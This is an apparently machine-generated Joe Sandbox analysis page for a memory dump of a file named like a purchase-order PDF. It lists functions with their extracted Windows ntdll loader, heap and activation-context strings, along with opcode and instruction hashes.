Instruction ID: 92f2236fbbb79d4d360f87147869a8be30c8f08248d345b77801587a391a4517
Opcode Fuzzy Hash: 7050ef8442b7dd724dd0fe2527fe9cf9e9ee87e488ad3364b8a2367cc5bd6726
Instruction Fuzzy Hash: 9E027EB1D002299BDB31DB54CD80BEAB7B8AF54704F0445EAE64DA7241EB70AF84CF59

Function 019E8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 019E8BD0
csrss.exe, xrefs: 019E8B80
runtimebroker.exe, xrefs: 019E8B73
svchost.exe, xrefs: 019E8B68
SegmentHeap, xrefs: 019E8BE9
lsass.exe, xrefs: 019E8BA1
DefaultBrowser_NOPUBLISHERID, xrefs: 019E8D00
smss.exe, xrefs: 019E8B8B
heapType, xrefs: 019E8BCB
services.exe, xrefs: 019E8B96

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: ec7417fccb309d1ad2d6256e0175612ee4fe1c35c70e1537c7814972c4f9c92c
Instruction ID: 6c1dc1d0e688de99cc78344f240f185c9e5bd499b7457d469b8c89b5c485de08
Opcode Fuzzy Hash: ec7417fccb309d1ad2d6256e0175612ee4fe1c35c70e1537c7814972c4f9c92c
Instruction Fuzzy Hash: 5851BF715043069BD32ADF98C888BABBBECEFD5640F14492DA95D83245E770D684CB92

Function 019F0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 019F03A6, 019F04B5, 019F05DD, 019F0682, 019F06D9
RtlReAllocateHeap, xrefs: 019F02BF, 019F0362
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 019F04D3
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 019F069F
Just reallocated block at %p to %Ix bytes, xrefs: 019F05F1
HEAP[%wZ]: , xrefs: 019F0399, 019F04A8, 019F05D0, 019F0675, 019F06CC
About to reallocate block at %p to %Ix bytes, xrefs: 019F03BA
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 019F06EA

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 1d0e617ef22ee361c4d5e0069fd73ea59491d78a7c97cc2de88c0ccc88ce2c55
Instruction ID: 0fe8e6b005704623f7d012b434b726cd1e2e6fbb7d69ac49b652b8f93b5e2c41
Opcode Fuzzy Hash: 1d0e617ef22ee361c4d5e0069fd73ea59491d78a7c97cc2de88c0ccc88ce2c55
Instruction Fuzzy Hash: D0D1EF35600685EFDB22DF69C801AA9BBFAFF89715F09804DF64D9B252D734D981CB10

Function 019C89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 019C8A3D
HandleTraces, xrefs: 019C8C8F
AVRF: -*- final list of providers -*- , xrefs: 019C8B8F
VerifierDlls, xrefs: 019C8CBD
VerifierDebug, xrefs: 019C8CA5
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 019C8A67
VerifierFlags, xrefs: 019C8C50

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 398bc7e47afc222efaf577fd811b095caca3718cac7e13c39e5b3925e4e3bc37
Instruction ID: 1ec64fba8b2e8d9dc439b784c4aa52c8413a683a6499b28523f2c81c5aee6f50
Opcode Fuzzy Hash: 398bc7e47afc222efaf577fd811b095caca3718cac7e13c39e5b3925e4e3bc37
Instruction Fuzzy Hash: 2E91F2B1A41716AFD721DF6CD880F5A7BA8ABD4F14F05082CFA8D6B244C770AD01CB96

Function 0194EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

R, xrefs: 0194EB62
T, xrefs: 0194EB4E
, xrefs: 0194F299
{, xrefs: 019A4643
LdrpResSearchResourceInsideDirectory Exit, xrefs: 0194EB6C
LdrpResSearchResourceInsideDirectory Enter, xrefs: 0194EB58

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: a42fb4fd5549614875b4e252be6bbe3c2217ff86f09e9a3d4aec93651bf5ac38
Instruction ID: e7d02a75a9758377cdd10d633e5d3dc2fdef89ba3d85b210050c293e44af518f
Opcode Fuzzy Hash: a42fb4fd5549614875b4e252be6bbe3c2217ff86f09e9a3d4aec93651bf5ac38
Instruction Fuzzy Hash: 26A26870E0562A8FDB64CF18CC88BA9BBB5BF89705F5442E9D90DA7250DB749E84CF40

Function 019763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

_LdrpInitialize, xrefs: 019B40DF, 019B4141, 019B4205, 019B425F
Delaying execution failed with status 0x%08lx, xrefs: 019B4258
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 019B40D8
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 019B41FE
Process initialization failed with status 0x%08lx, xrefs: 019B413A
minkernel\ntdll\ldrinit.c, xrefs: 019B40E9, 019B414B, 019B420F, 019B4269

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 87dca22ece9a59b2550f97d14bb9d6919d73a53b859edcade862ffc72fda43ed
Instruction ID: 8a194ece3d4de41b333b8f4e2f7a5b87996a2832fea06b3a84af365a9bb0e240
Opcode Fuzzy Hash: 87dca22ece9a59b2550f97d14bb9d6919d73a53b859edcade862ffc72fda43ed
Instruction Fuzzy Hash: E8913730F04715EBFB25DF58DD84BEA7BA9BF91B24F000129E50D6B286D7749802D791

Function 0193645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01936496
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01999A2A
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01999A01
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019999ED
minkernel\ntdll\ldrinit.c, xrefs: 01999A11, 01999A3A
LdrpInitShimEngine, xrefs: 019999F4, 01999A07, 01999A30

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 3b45b53a79fc4be7a96cacdb3ee8bab821aaab35fdabceb06afe90d3d25286d5
Instruction ID: ab0a350b402af3bb2dc1046fe3a4a588fd06eb77cb8e41e0e754b737fd6f013d
Opcode Fuzzy Hash: 3b45b53a79fc4be7a96cacdb3ee8bab821aaab35fdabceb06afe90d3d25286d5
Instruction Fuzzy Hash: 46518071608305ABEB25DF28D841FAB7BE9FFC4648F00091DF58D971A4D634EA45CB92

Function 0197C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 019B8181, 019B81F5
LdrpInitializeProcess, xrefs: 0197C6C4
Unable to build import redirection Table, Status = 0x%x, xrefs: 019B81E5
Loading import redirection DLL: '%wZ', xrefs: 019B8170
LdrpInitializeImportRedirection, xrefs: 019B8177, 019B81EB
minkernel\ntdll\ldrinit.c, xrefs: 0197C6C3

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: d94202eb90cd8a836f791c6066bd642b39baf3d65f891bcdd6fa8204d0808afe
Instruction ID: ea764fe4f38fe3e067b68167b6160267f75f99d61f8de29df03e62620820e8e4
Opcode Fuzzy Hash: d94202eb90cd8a836f791c6066bd642b39baf3d65f891bcdd6fa8204d0808afe
Instruction Fuzzy Hash: 3B31F271644307ABC224EF68DD86E6A77D8FFD4B10F04051CF98CAB295E620ED05CBA2

Function 01972674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 019B2178
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 019B219F
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019B21BF
RtlGetAssemblyStorageRoot, xrefs: 019B2160, 019B219A, 019B21BA
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 019B2180
SXS: %s() passed the empty activation context, xrefs: 019B2165

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 2081ec510071fe228d9571558058928c86d0dcdd046ed9135bd8d0fa0f2ccab4
Instruction ID: 3886ed3491a10ab646e154eb00e9c9a43d99f6cc655cf7a3667b0a3d12fd58f4
Opcode Fuzzy Hash: 2081ec510071fe228d9571558058928c86d0dcdd046ed9135bd8d0fa0f2ccab4
Instruction Fuzzy Hash: 3031E936F402257BF7218B998DC5FAABB79EFA4A50F050059FB0C77245D270AA01C6A1

Function 0198096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01982DF0: LdrInitializeThunk.NTDLL ref: 01982DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01980BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01980BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01980D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01980D74

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 7514136761c2a554b29e07739d21aab689c7ca1ad212b997c3e683cbccc19581
Instruction ID: 369a7155a3c4b2a271470fc5bf2f38f5af22f6c10a55d6822b7e2011f66a80e4
Opcode Fuzzy Hash: 7514136761c2a554b29e07739d21aab689c7ca1ad212b997c3e683cbccc19581
Instruction Fuzzy Hash: 37426CB2900715DFDB61DF28C980BAAB7F8BF44314F1445A9E98DEB242D770A984CF60

Function 0194A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 0194A3EF
LdrResFallbackLangList Exit, xrefs: 0194A3FF
8, xrefs: 0194A3E7
6, xrefs: 0194A3F7

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 32b332302b96a39907b6c4c59e785b77f44f415119f85991a0420bfee7017833
Instruction ID: 446a4967066c8e52600aea194c30a98db43c2d00a685ea1cbfce339dc7eb60d8
Opcode Fuzzy Hash: 32b332302b96a39907b6c4c59e785b77f44f415119f85991a0420bfee7017833
Instruction Fuzzy Hash: F1C19B74548382CFD715CF58C144F6AB7E8FF84704F04496AF99A8B291E738CA49CB92

Function 01978402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 01978422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0197855E
@, xrefs: 01978591
minkernel\ntdll\ldrinit.c, xrefs: 01978421

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 2706a310b914fb5f48f7127fb3b0a749d3f84f25f4ce14a81422f3c563502f9e
Instruction ID: 2aa38375ad087932ecb337df4bb9f3936c2b04daeb8e294580585fb35150ac3e
Opcode Fuzzy Hash: 2706a310b914fb5f48f7127fb3b0a749d3f84f25f4ce14a81422f3c563502f9e
Instruction Fuzzy Hash: 0C916871508345AFE721EF65CC85FABBAECBF84784F40092EFA8C96151E270D944CB62

Function 0197273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 019728D8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019B21D9, 019B22B1
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019B22B6
SXS: %s() passed the empty activation context, xrefs: 019B21DE

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 03f59b449ac6f3c60b12b9dcc021ee7a70186eda2be0a6f635c646809fc8af8b
Instruction ID: b4c5edd95fae2561be4ab7e3058d98f36014fbe25cd5b1d220d2f1f9aac516c7
Opcode Fuzzy Hash: 03f59b449ac6f3c60b12b9dcc021ee7a70186eda2be0a6f635c646809fc8af8b
Instruction Fuzzy Hash: FDA1B031910229DBDB25CF68C984BE9B7B5FF58354F2845E9D90CAB251D730AE81CF90

Function 01974AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

RtlDeactivateActivationContext, xrefs: 019B3425, 019B3432, 019B3451
SXS: %s() called with invalid flags 0x%08lx, xrefs: 019B342A
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 019B3456
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 019B3437

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 5fa1dcf96d74ead1399a172c1a8bb12c51d0bb859d96623a182fb016561b531f
Instruction ID: de4a75749a2708e1a0de6e3d4823bbe1c098361287fd4fcbc3ee0bee879bc4aa
Opcode Fuzzy Hash: 5fa1dcf96d74ead1399a172c1a8bb12c51d0bb859d96623a182fb016561b531f
Instruction Fuzzy Hash: 356121366007129BD722CF1DC981FBAB7EABF80B51F19852DE85D9B242D734E901CB91

Function 019464AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019A10AE
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 019A106B
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 019A1028
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 019A0FE5

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 9b836927c9c42dddff9c12a0ab318837b2c77f95102d504f962b460f381f2072
Instruction ID: c5656b6ebc36bef3f380fd7b47d1181235f29b8adbf3110a396a85d0d161e7ae
Opcode Fuzzy Hash: 9b836927c9c42dddff9c12a0ab318837b2c77f95102d504f962b460f381f2072
Instruction Fuzzy Hash: 9E71CDB19043459FCB21EF18C884F9B7BADAF96764F400868F94D8B246D334D589CBD2

Function 0196245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01962462
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 019AA992
LdrpDynamicShimModule, xrefs: 019AA998
minkernel\ntdll\ldrinit.c, xrefs: 019AA9A2

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 3c870527c84c305179e94551ac807d6a6d34faa1671acb6fe8c003db31e60f99
Instruction ID: cb4de5b81f391a4724a2310160ab95054d5022aceab9826f932cf103a342628a
Opcode Fuzzy Hash: 3c870527c84c305179e94551ac807d6a6d34faa1671acb6fe8c003db31e60f99
Instruction Fuzzy Hash: 4A316879A00202ABDB32DF5DDC85FAA7BB9FFC8B00F550419F8096B245C7B49946C790

Function 019529A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01953264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0195327D
HEAP[%wZ]: , xrefs: 01953255

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 6b52603d93f77221a7d295e8f86a434a2a0d61aef288cf86f0cd47315569c006
Instruction ID: f0a151fba94ad02f85fee498b7772fa67610108a17811ecc79c93493052ccbfc
Opcode Fuzzy Hash: 6b52603d93f77221a7d295e8f86a434a2a0d61aef288cf86f0cd47315569c006
Instruction Fuzzy Hash: C692BC71A04249DFDB65CF68C440BAEBBF5FF48304F188499E84AAB392D735AA45CF50

Function 01950770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 019A50BD
(UCRBlock->Size >= *Size), xrefs: 019A50CA
HEAP[%wZ]: , xrefs: 019A50AE

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 0bf4274b762defb600fec98e9da4c1cffda4d32b19c7c7ec1261cf913b778ed6
Instruction ID: 032e0c581ba4a4c4c47e61bfb87c54c56400ce83143bf8beac20f86da3e62118
Opcode Fuzzy Hash: 0bf4274b762defb600fec98e9da4c1cffda4d32b19c7c7ec1261cf913b778ed6
Instruction Fuzzy Hash: FDF1AB30B00606DFEB55CF68C894F6AB7B5FF84304F198568E91AAB385D730E985CB91

Function 01966962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 01966C24
, xrefs: 019ACA51

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 7f21551a06d3198c5f0640c2ff6b0ac7ef363fd70bbd3084aec1e0797e80f22f
Instruction ID: a3c25f7fb427ffaaf6b57667a5c0d35219a93e314cd2ad85d083e27ceb52bbb9
Opcode Fuzzy Hash: 7f21551a06d3198c5f0640c2ff6b0ac7ef363fd70bbd3084aec1e0797e80f22f
Instruction Fuzzy Hash: 53C260716083419FD729CF68C881BABBBE9BFC8754F04892DE98D97241D734D845CBA2

Function 0193A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 0199C2E6
\??\, xrefs: 0199C1E4
UseFilter, xrefs: 0193A1C1

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 2e5c7d0f485f819ac8ad71ed988fa94fa2dc6a669641b9bfbdd9b9b21e737cd2
Instruction ID: 1548142f0d65dd7dcca3cc9ea8073d25d4a4b87d6292b98f17ef821ab3f53100
Opcode Fuzzy Hash: 2e5c7d0f485f819ac8ad71ed988fa94fa2dc6a669641b9bfbdd9b9b21e737cd2
Instruction Fuzzy Hash: F6A14B759116299BDF31DF68CC88BAAB7B8EF88711F1001EAE90DA7250D7359E84CF50

Function 01960BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

LdrpCheckModule, xrefs: 019AA117
minkernel\ntdll\ldrinit.c, xrefs: 019AA121
Failed to allocated memory for shimmed module list, xrefs: 019AA10F

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: eda8f4746f670e19246eebb07dd1c11fe4880389522a2b829b5028d2650ed626
Instruction ID: 573f599d3dbf714891d0db4e66b22b48aeebaf67c2f23871568cfbfccccbce2a
Opcode Fuzzy Hash: eda8f4746f670e19246eebb07dd1c11fe4880389522a2b829b5028d2650ed626
Instruction Fuzzy Hash: A671B374E00205AFDB25DF68CD85BAEB7F8FB88304F18446DE4099B255D739A946CB60

Function 01950A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 019A5342
HEAP[%wZ]: , xrefs: 019A5335
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 019A534D

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 50a266c350549ac66304f819e83c1da3c4ad1cce6abf5b9d093e365a0e573d66
Instruction ID: 82415c4646f77906919082dd713b5d94b8656f862964b86c178792ebaa7120f3
Opcode Fuzzy Hash: 50a266c350549ac66304f819e83c1da3c4ad1cce6abf5b9d093e365a0e573d66
Instruction Fuzzy Hash: 7E61BD30600302DFEB69CF28D584B6ABBE5FF84304F198959F85D9B296D770E881CB91

Function 0197C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 019B82DE
Failed to reallocate the system dirs string !, xrefs: 019B82D7
minkernel\ntdll\ldrinit.c, xrefs: 019B82E8

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: ad998049b97891764d97d46a2dff9a0653bbc2e591df91cb72da3a61a4574291
Instruction ID: 2b4115b020d194cce72932c3e6ec201f7f40cf0fab243983db86303b430b5423
Opcode Fuzzy Hash: ad998049b97891764d97d46a2dff9a0653bbc2e591df91cb72da3a61a4574291
Instruction Fuzzy Hash: 6341D175544302ABD721EB68DD85B9BBBECBF89790F00492AF94DD3250EB70D901CB92

Function 019FC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 019FC1F1
PreferredUILanguages, xrefs: 019FC212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 019FC1C5

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: bf51a960a6dac28e2d27706e3783fc47aef16d17f72f68553a33777bde750ec5
Instruction ID: e45cdb0e5a60d41cf92e06514e1543f8bc3312d75fce74bfeab0d4eac28fd10d
